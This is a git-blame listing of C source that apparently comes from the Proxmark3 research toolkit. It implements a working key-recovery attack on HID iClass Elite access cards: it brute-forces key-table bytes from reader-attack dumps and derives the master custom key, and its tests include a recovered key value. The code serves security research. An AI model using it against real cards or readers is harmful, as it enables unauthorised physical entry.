]>
Commit | Line | Data |
---|---|---|
3ad48540 MHS |
1 | #include <stdint.h> |
2 | #include <stdbool.h> | |
3 | #include <string.h> | |
4 | #include <stdio.h> | |
5 | #include <time.h> | |
6 | #include "cipherutils.h" | |
7 | #include "cipher.h" | |
8 | #include "ikeys.h" | |
9 | #include "elite_crack.h" | |
10 | #include "fileutils.h" | |
11 | #include "des.h" | |
12 | ||
13 | /** | |
14 | * @brief Permutes a key from standard NIST format to Iclass specific format | |
15 | * from http://www.proxmark.org/forum/viewtopic.php?pid=11220#p11220 | |
16 | * | |
17 | * If you permute [6c 8d 44 f9 2a 2d 01 bf] you get [8a 0d b9 88 bb a7 90 ea] as shown below. | |
18 | * | |
19 | * 1 0 1 1 1 1 1 1 bf | |
20 | * 0 0 0 0 0 0 0 1 01 | |
21 | * 0 0 1 0 1 1 0 1 2d | |
22 | * 0 0 1 0 1 0 1 0 2a | |
23 | * 1 1 1 1 1 0 0 1 f9 | |
24 | * 0 1 0 0 0 1 0 0 44 | |
25 | * 1 0 0 0 1 1 0 1 8d | |
26 | * 0 1 1 0 1 1 0 0 6c | |
27 | * | |
28 | * 8 0 b 8 b a 9 e | |
29 | * a d 9 8 b 7 0 a | |
30 | * | |
31 | * @param key | |
32 | * @param dest | |
33 | */ | |
34 | void permutekey(uint8_t key[8], uint8_t dest[8]) | |
35 | { | |
36 | ||
37 | int i; | |
38 | for(i = 0 ; i < 8 ; i++) | |
39 | { | |
40 | dest[i] = (((key[7] & (0x80 >> i)) >> (7-i)) << 7) | | |
41 | (((key[6] & (0x80 >> i)) >> (7-i)) << 6) | | |
42 | (((key[5] & (0x80 >> i)) >> (7-i)) << 5) | | |
43 | (((key[4] & (0x80 >> i)) >> (7-i)) << 4) | | |
44 | (((key[3] & (0x80 >> i)) >> (7-i)) << 3) | | |
45 | (((key[2] & (0x80 >> i)) >> (7-i)) << 2) | | |
46 | (((key[1] & (0x80 >> i)) >> (7-i)) << 1) | | |
47 | (((key[0] & (0x80 >> i)) >> (7-i)) << 0); | |
48 | } | |
49 | ||
50 | return; | |
51 | } | |
52 | /** | |
53 | * Permutes a key from iclass specific format to NIST format | |
54 | * @brief permutekey_rev | |
55 | * @param key | |
56 | * @param dest | |
57 | */ | |
58 | void permutekey_rev(uint8_t key[8], uint8_t dest[8]) | |
59 | { | |
60 | int i; | |
61 | for(i = 0 ; i < 8 ; i++) | |
62 | { | |
63 | dest[7-i] = (((key[0] & (0x80 >> i)) >> (7-i)) << 7) | | |
64 | (((key[1] & (0x80 >> i)) >> (7-i)) << 6) | | |
65 | (((key[2] & (0x80 >> i)) >> (7-i)) << 5) | | |
66 | (((key[3] & (0x80 >> i)) >> (7-i)) << 4) | | |
67 | (((key[4] & (0x80 >> i)) >> (7-i)) << 3) | | |
68 | (((key[5] & (0x80 >> i)) >> (7-i)) << 2) | | |
69 | (((key[6] & (0x80 >> i)) >> (7-i)) << 1) | | |
70 | (((key[7] & (0x80 >> i)) >> (7-i)) << 0); | |
71 | } | |
72 | } | |
73 | ||
74 | /** | |
75 | * Helper function for hash1 | |
76 | * @brief rr | |
77 | * @param val | |
78 | * @return | |
79 | */ | |
80 | uint8_t rr(uint8_t val) | |
81 | { | |
82 | return val >> 1 | (( val & 1) << 7); | |
83 | } | |
84 | /** | |
85 | * Helper function for hash1 | |
86 | * @brief rl | |
87 | * @param val | |
88 | * @return | |
89 | */ | |
90 | uint8_t rl(uint8_t val) | |
91 | { | |
92 | return val << 1 | (( val & 0x80) >> 7); | |
93 | } | |
94 | /** | |
95 | * Helper function for hash1 | |
96 | * @brief swap | |
97 | * @param val | |
98 | * @return | |
99 | */ | |
100 | uint8_t swap(uint8_t val) | |
101 | { | |
102 | return ((val >> 4) & 0xFF) | ((val &0xFF) << 4); | |
103 | } | |
104 | ||
105 | /** | |
106 | * Hash1 takes CSN as input, and determines what bytes in the keytable will be used | |
107 | * when constructing the K_sel. | |
108 | * @param csn the CSN used | |
109 | * @param k output | |
110 | */ | |
111 | void hash1(uint8_t csn[] , uint8_t k[]) | |
112 | { | |
113 | k[0] = csn[0]^csn[1]^csn[2]^csn[3]^csn[4]^csn[5]^csn[6]^csn[7]; | |
114 | k[1] = csn[0]+csn[1]+csn[2]+csn[3]+csn[4]+csn[5]+csn[6]+csn[7]; | |
115 | k[2] = rr(swap( csn[2]+k[1] )); | |
116 | k[3] = rr(swap( csn[3]+k[0] )); | |
117 | k[4] = ~rr(swap( csn[4]+k[2] ))+1; | |
118 | k[5] = ~rr(swap( csn[5]+k[3] ))+1; | |
119 | k[6] = rr( csn[6]+(k[4]^0x3c) ); | |
120 | k[7] = rl( csn[7]+(k[5]^0xc3) ); | |
121 | int i; | |
122 | for(i = 7; i >=0; i--) | |
123 | k[i] = k[i] & 0x7F; | |
124 | } | |
125 | ||
126 | ||
127 | /** | |
128 | * @brief Reads data from the iclass-reader-attack dump file. | |
129 | * @param dump, data from a iclass reader attack dump. The format of the dumpdata is expected to be as follows: | |
130 | * <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC><8 byte HASH1><1 byte NUM_BYTES_TO_RECOVER><3 bytes BYTES_TO_RECOVER> | |
131 | * .. N times... | |
132 | * | |
133 | * So the first attack, with 3 bytes to recover would be : ... 03000145 | |
134 | * And a later attack, with 1 byte to recover (byte 0x5)would be : ...01050000 | |
135 | * And an attack, with 2 bytes to recover (byte 0x5 and byte 0x07 )would be : ...02050700 | |
136 | * | |
137 | * @param cc_nr an array to store cc_nr into (12 bytes) | |
138 | * @param csn an arracy ot store CSN into (8 bytes) | |
139 | * @param received_mac an array to store MAC into (4 bytes) | |
140 | * @param i the number to read. Should be less than 127, or something is wrong... | |
141 | * @return | |
142 | */ | |
143 | int _readFromDump(uint8_t dump[], dumpdata* item, uint8_t i) | |
144 | { | |
145 | size_t itemsize = sizeof(dumpdata); | |
146 | //dumpdata item = {0}; | |
147 | memcpy(item,dump+i*itemsize, itemsize); | |
148 | if(true) | |
149 | { | |
150 | printvar("csn", item->csn,8); | |
151 | printvar("cc_nr", item->cc_nr,12); | |
152 | printvar("mac", item->mac,4); | |
153 | } | |
154 | return 0; | |
155 | } | |
156 | ||
157 | static uint32_t startvalue = 0; | |
158 | /** | |
159 | * @brief Performs brute force attack against a dump-data item, containing csn, cc_nr and mac. | |
160 | *This method calculates the hash1 for the CSN, and determines what bytes need to be bruteforced | |
161 | *on the fly. If it finds that more than three bytes need to be bruteforced, it aborts. | |
162 | *It updates the keytable with the findings, also using the upper half of the 16-bit ints | |
163 | *to signal if the particular byte has been cracked or not. | |
164 | * | |
165 | * @param dump The dumpdata from iclass reader attack. | |
166 | * @param keytable where to write found values. | |
167 | * @return | |
168 | */ | |
169 | int bruteforceItem(dumpdata item, uint16_t keytable[]) | |
170 | { | |
171 | int errors = 0; | |
172 | uint8_t key_sel_p[8] = { 0 }; | |
173 | uint8_t div_key[8] = {0}; | |
174 | int found = false; | |
175 | uint8_t key_sel[8] = {0}; | |
176 | uint8_t calculated_MAC[4] = { 0 }; | |
177 | ||
178 | //Get the key index (hash1) | |
179 | uint8_t key_index[8] = {0}; | |
180 | hash1(item.csn, key_index); | |
181 | ||
182 | ||
183 | /* | |
184 | * Determine which bytes to retrieve. A hash is typically | |
185 | * 01010000454501 | |
186 | * We go through that hash, and in the corresponding keytable, we put markers | |
187 | * on what state that particular index is: | |
188 | * - CRACKED (this has already been cracked) | |
189 | * - BEING_CRACKED (this is being bruteforced now) | |
190 | * - CRACK_FAILED (self-explaining...) | |
191 | * | |
192 | * The markers are placed in the high area of the 16 bit key-table. | |
193 | * Only the lower eight bits correspond to the (hopefully cracked) key-value. | |
194 | **/ | |
195 | uint8_t bytes_to_recover[3] = {0}; | |
196 | uint8_t numbytes_to_recover = 0 ; | |
197 | int i; | |
198 | for(i =0 ; i < 8 ; i++) | |
199 | { | |
200 | if(keytable[key_index[i]] & (CRACKED | BEING_CRACKED)) continue; | |
201 | bytes_to_recover[numbytes_to_recover++] = key_index[i]; | |
202 | keytable[key_index[i]] |= BEING_CRACKED; | |
203 | ||
204 | if(numbytes_to_recover > 3) | |
205 | { | |
206 | prnlog("The CSN requires > 3 byte bruteforce, not supported"); | |
207 | printvar("CSN", item.csn,8); | |
208 | printvar("HASH1", key_index,8); | |
209 | ||
210 | //Before we exit, reset the 'BEING_CRACKED' to zero | |
211 | keytable[bytes_to_recover[0]] &= ~BEING_CRACKED; | |
212 | keytable[bytes_to_recover[1]] &= ~BEING_CRACKED; | |
213 | keytable[bytes_to_recover[2]] &= ~BEING_CRACKED; | |
214 | ||
215 | return 1; | |
216 | } | |
217 | } | |
218 | ||
219 | /* | |
220 | *A uint32 has room for 4 bytes, we'll only need 24 of those bits to bruteforce up to three bytes, | |
221 | */ | |
222 | uint32_t brute = startvalue; | |
223 | /* | |
224 | Determine where to stop the bruteforce. A 1-byte attack stops after 256 tries, | |
225 | (when brute reaches 0x100). And so on... | |
226 | bytes_to_recover = 1 --> endmask = 0x0000100 | |
227 | bytes_to_recover = 2 --> endmask = 0x0010000 | |
228 | bytes_to_recover = 3 --> endmask = 0x1000000 | |
229 | */ | |
230 | ||
231 | uint32_t endmask = 1 << 8*numbytes_to_recover; | |
232 | ||
233 | for(i =0 ; i < numbytes_to_recover && numbytes_to_recover > 1; i++) | |
234 | prnlog("Bruteforcing byte %d", bytes_to_recover[i]); | |
235 | ||
236 | while(!found && !(brute & endmask)) | |
237 | { | |
238 | ||
239 | //Update the keytable with the brute-values | |
240 | for(i =0 ; i < numbytes_to_recover; i++) | |
241 | { | |
242 | keytable[bytes_to_recover[i]] &= 0xFF00; | |
243 | keytable[bytes_to_recover[i]] |= (brute >> (i*8) & 0xFF); | |
244 | } | |
245 | ||
246 | // Piece together the key | |
247 | key_sel[0] = keytable[key_index[0]] & 0xFF;key_sel[1] = keytable[key_index[1]] & 0xFF; | |
248 | key_sel[2] = keytable[key_index[2]] & 0xFF;key_sel[3] = keytable[key_index[3]] & 0xFF; | |
249 | key_sel[4] = keytable[key_index[4]] & 0xFF;key_sel[5] = keytable[key_index[5]] & 0xFF; | |
250 | key_sel[6] = keytable[key_index[6]] & 0xFF;key_sel[7] = keytable[key_index[7]] & 0xFF; | |
251 | ||
252 | //Permute from iclass format to standard format | |
253 | permutekey_rev(key_sel,key_sel_p); | |
254 | //Diversify | |
255 | diversifyKey(item.csn, key_sel_p, div_key); | |
256 | //Calc mac | |
257 | doMAC(item.cc_nr, div_key,calculated_MAC); | |
258 | ||
259 | if(memcmp(calculated_MAC, item.mac, 4) == 0) | |
260 | { | |
261 | for(i =0 ; i < numbytes_to_recover; i++) | |
262 | prnlog("=> %d: 0x%02x", bytes_to_recover[i],0xFF & keytable[bytes_to_recover[i]]); | |
263 | found = true; | |
264 | break; | |
265 | } | |
266 | brute++; | |
267 | if((brute & 0xFFFF) == 0) | |
268 | { | |
269 | printf("%d",(brute >> 16) & 0xFF); | |
270 | fflush(stdout); | |
271 | } | |
272 | } | |
273 | if(! found) | |
274 | { | |
275 | prnlog("Failed to recover %d bytes using the following CSN",numbytes_to_recover); | |
276 | printvar("CSN",item.csn,8); | |
277 | errors++; | |
278 | //Before we exit, reset the 'BEING_CRACKED' to zero | |
279 | for(i =0 ; i < numbytes_to_recover; i++) | |
280 | { | |
281 | keytable[bytes_to_recover[i]] &= 0xFF; | |
282 | keytable[bytes_to_recover[i]] |= CRACK_FAILED; | |
283 | } | |
284 | ||
285 | }else | |
286 | { | |
287 | for(i =0 ; i < numbytes_to_recover; i++) | |
288 | { | |
289 | keytable[bytes_to_recover[i]] &= 0xFF; | |
290 | keytable[bytes_to_recover[i]] |= CRACKED; | |
291 | } | |
292 | ||
293 | } | |
294 | return errors; | |
295 | } | |
296 | ||
297 | ||
298 | /** | |
299 | * From dismantling iclass-paper: | |
300 | * Assume that an adversary somehow learns the first 16 bytes of hash2(K_cus ), i.e., y [0] and z [0] . | |
301 | * Then he can simply recover the master custom key K_cus by computing | |
302 | * K_cus = ~DES(z[0] , y[0] ) . | |
303 | * | |
304 | * Furthermore, the adversary is able to verify that he has the correct K cus by | |
305 | * checking whether z [0] = DES enc (K_cus , ~K_cus ). | |
306 | * @param keytable an array (128 bytes) of hash2(kcus) | |
307 | * @param master_key where to put the master key | |
308 | * @return 0 for ok, 1 for failz | |
309 | */ | |
310 | int calculateMasterKey(uint8_t first16bytes[], uint64_t master_key[] ) | |
311 | { | |
312 | des_context ctx_e = {DES_ENCRYPT,{0}}; | |
313 | ||
314 | uint8_t z_0[8] = {0}; | |
315 | uint8_t y_0[8] = {0}; | |
316 | uint8_t z_0_rev[8] = {0}; | |
317 | uint8_t key64[8] = {0}; | |
318 | uint8_t key64_negated[8] = {0}; | |
319 | uint8_t result[8] = {0}; | |
320 | ||
321 | // y_0 and z_0 are the first 16 bytes of the keytable | |
322 | memcpy(y_0,first16bytes,8); | |
323 | memcpy(z_0,first16bytes+8,8); | |
324 | ||
325 | // Our DES-implementation uses the standard NIST | |
326 | // format for keys, thus must translate from iclass | |
327 | // format to NIST-format | |
328 | permutekey_rev(z_0, z_0_rev); | |
329 | ||
330 | // ~K_cus = DESenc(z[0], y[0]) | |
331 | des_setkey_enc( &ctx_e, z_0_rev ); | |
332 | des_crypt_ecb(&ctx_e, y_0, key64_negated); | |
333 | ||
334 | int i; | |
335 | for(i = 0; i < 8 ; i++) | |
336 | { | |
337 | key64[i] = ~key64_negated[i]; | |
338 | } | |
339 | ||
340 | // Can we verify that the key is correct? | |
341 | // Once again, key is on iclass-format | |
342 | uint8_t key64_stdformat[8] = {0}; | |
343 | permutekey_rev(key64, key64_stdformat); | |
344 | ||
345 | des_setkey_enc( &ctx_e, key64_stdformat ); | |
346 | des_crypt_ecb(&ctx_e, key64_negated, result); | |
347 | prnlog("\nHigh security custom key (Kcus):"); | |
348 | printvar("Std format ", key64_stdformat,8); | |
349 | printvar("Iclass format", key64,8); | |
350 | ||
351 | if(master_key != NULL) | |
352 | memcpy(master_key, key64, 8); | |
353 | ||
354 | if(memcmp(z_0,result,4) != 0) | |
355 | { | |
356 | prnlog("Failed to verify calculated master key (k_cus)! Something is wrong."); | |
357 | return 1; | |
358 | }else{ | |
359 | prnlog("Key verified ok!\n"); | |
360 | } | |
361 | return 0; | |
362 | } | |
363 | /** | |
364 | * @brief Same as bruteforcefile, but uses a an array of dumpdata instead | |
365 | * @param dump | |
366 | * @param dumpsize | |
367 | * @param keytable | |
368 | * @return | |
369 | */ | |
370 | int bruteforceDump(uint8_t dump[], size_t dumpsize, uint16_t keytable[]) | |
371 | { | |
372 | uint8_t i; | |
373 | int errors = 0; | |
374 | size_t itemsize = sizeof(dumpdata); | |
375 | clock_t t1 = clock(); | |
376 | ||
377 | dumpdata* attack = (dumpdata* ) malloc(itemsize); | |
378 | ||
379 | for(i = 0 ; i * itemsize < dumpsize ; i++ ) | |
380 | { | |
381 | memcpy(attack,dump+i*itemsize, itemsize); | |
382 | errors += bruteforceItem(*attack, keytable); | |
383 | } | |
384 | free(attack); | |
385 | clock_t t2 = clock(); | |
386 | float diff = (((float)t2 - (float)t1) / CLOCKS_PER_SEC ); | |
387 | prnlog("\nPerformed full crack in %f seconds",diff); | |
388 | ||
389 | // Pick out the first 16 bytes of the keytable. | |
390 | // The keytable is now in 16-bit ints, where the upper 8 bits | |
391 | // indicate crack-status. Those must be discarded for the | |
392 | // master key calculation | |
393 | uint8_t first16bytes[16] = {0}; | |
394 | ||
395 | for(i = 0 ; i < 16 ; i++) | |
396 | { | |
397 | first16bytes[i] = keytable[i] & 0xFF; | |
398 | if(!(keytable[i] & CRACKED)) | |
399 | { | |
400 | prnlog("Error, we are missing byte %d, custom key calculation will fail...", i); | |
401 | } | |
402 | } | |
403 | errors += calculateMasterKey(first16bytes, NULL); | |
404 | return errors; | |
405 | } | |
406 | /** | |
407 | * Perform a bruteforce against a file which has been saved by pm3 | |
408 | * | |
409 | * @brief bruteforceFile | |
410 | * @param filename | |
411 | * @return | |
412 | */ | |
413 | int bruteforceFile(const char *filename, uint16_t keytable[]) | |
414 | { | |
415 | ||
416 | FILE *f = fopen(filename, "rb"); | |
417 | if(!f) { | |
418 | prnlog("Failed to read from file '%s'", filename); | |
419 | return 1; | |
420 | } | |
421 | ||
422 | fseek(f, 0, SEEK_END); | |
423 | long fsize = ftell(f); | |
424 | fseek(f, 0, SEEK_SET); | |
425 | ||
426 | uint8_t *dump = malloc(fsize); | |
427 | size_t bytes_read = fread(dump, fsize, 1, f); | |
428 | ||
429 | fclose(f); | |
430 | if (bytes_read < fsize) | |
431 | { | |
432 | prnlog("Error, could only read %d bytes (should be %d)",bytes_read, fsize ); | |
433 | } | |
434 | return bruteforceDump(dump,fsize,keytable); | |
435 | } | |
436 | /** | |
437 | * | |
438 | * @brief Same as above, if you don't care about the returned keytable (results only printed on screen) | |
439 | * @param filename | |
440 | * @return | |
441 | */ | |
442 | int bruteforceFileNoKeys(const char *filename) | |
443 | { | |
444 | uint16_t keytable[128] = {0}; | |
445 | return bruteforceFile(filename, keytable); | |
446 | } | |
447 | ||
448 | // --------------------------------------------------------------------------------- | |
449 | // ALL CODE BELOW THIS LINE IS PURELY TESTING | |
450 | // --------------------------------------------------------------------------------- | |
451 | // ---------------------------------------------------------------------------- | |
452 | // TEST CODE BELOW | |
453 | // ---------------------------------------------------------------------------- | |
454 | ||
455 | int _testBruteforce() | |
456 | { | |
457 | int errors = 0; | |
458 | if(true){ | |
459 | // First test | |
460 | prnlog("[+] Testing crack from dumpfile..."); | |
461 | ||
462 | /** | |
463 | Expected values for the dumpfile: | |
464 | High Security Key Table | |
465 | ||
466 | 00 F1 35 59 A1 0D 5A 26 7F 18 60 0B 96 8A C0 25 C1 | |
467 | 10 BF A1 3B B0 FF 85 28 75 F2 1F C6 8F 0E 74 8F 21 | |
468 | 20 14 7A 55 16 C8 A9 7D B3 13 0C 5D C9 31 8D A9 B2 | |
469 | 30 A3 56 83 0F 55 7E DE 45 71 21 D2 6D C1 57 1C 9C | |
470 | 40 78 2F 64 51 42 7B 64 30 FA 26 51 76 D3 E0 FB B6 | |
471 | 50 31 9F BF 2F 7E 4F 94 B4 BD 4F 75 91 E3 1B EB 42 | |
472 | 60 3F 88 6F B8 6C 2C 93 0D 69 2C D5 20 3C C1 61 95 | |
473 | 70 43 08 A0 2F FE B3 26 D7 98 0B 34 7B 47 70 A0 AB | |
474 | ||
475 | **** The 64-bit HS Custom Key Value = 5B7C62C491C11B39 **** | |
476 | **/ | |
477 | uint16_t keytable[128] = {0}; | |
478 | //save some time... | |
479 | startvalue = 0x7B0000; | |
480 | errors |= bruteforceFile("iclass_dump.bin",keytable); | |
481 | } | |
482 | return errors; | |
483 | } | |
484 | ||
485 | int _test_iclass_key_permutation() | |
486 | { | |
487 | uint8_t testcase[8] = {0x6c,0x8d,0x44,0xf9,0x2a,0x2d,0x01,0xbf}; | |
488 | uint8_t testcase_output[8] = {0}; | |
489 | uint8_t testcase_output_correct[8] = {0x8a,0x0d,0xb9,0x88,0xbb,0xa7,0x90,0xea}; | |
490 | uint8_t testcase_output_rev[8] = {0}; | |
491 | permutekey(testcase, testcase_output); | |
492 | permutekey_rev(testcase_output, testcase_output_rev); | |
493 | ||
494 | ||
495 | if(memcmp(testcase_output, testcase_output_correct,8) != 0) | |
496 | { | |
497 | prnlog("Error with iclass key permute!"); | |
498 | printarr("testcase_output", testcase_output, 8); | |
499 | printarr("testcase_output_correct", testcase_output_correct, 8); | |
500 | return 1; | |
501 | ||
502 | } | |
503 | if(memcmp(testcase, testcase_output_rev, 8) != 0) | |
504 | { | |
505 | prnlog("Error with reverse iclass key permute"); | |
506 | printarr("testcase", testcase, 8); | |
507 | printarr("testcase_output_rev", testcase_output_rev, 8); | |
508 | return 1; | |
509 | } | |
510 | ||
511 | prnlog("[+] Iclass key permutation OK!"); | |
512 | return 0; | |
513 | } | |
514 | ||
515 | int testElite() | |
516 | { | |
517 | prnlog("[+] Testing iClass Elite functinality..."); | |
518 | prnlog("[+] Testing key diversification ..."); | |
519 | ||
520 | int errors = 0 ; | |
521 | errors +=_test_iclass_key_permutation(); | |
522 | errors += _testBruteforce(); | |
523 | return errors; | |
524 | ||
525 | } | |
526 |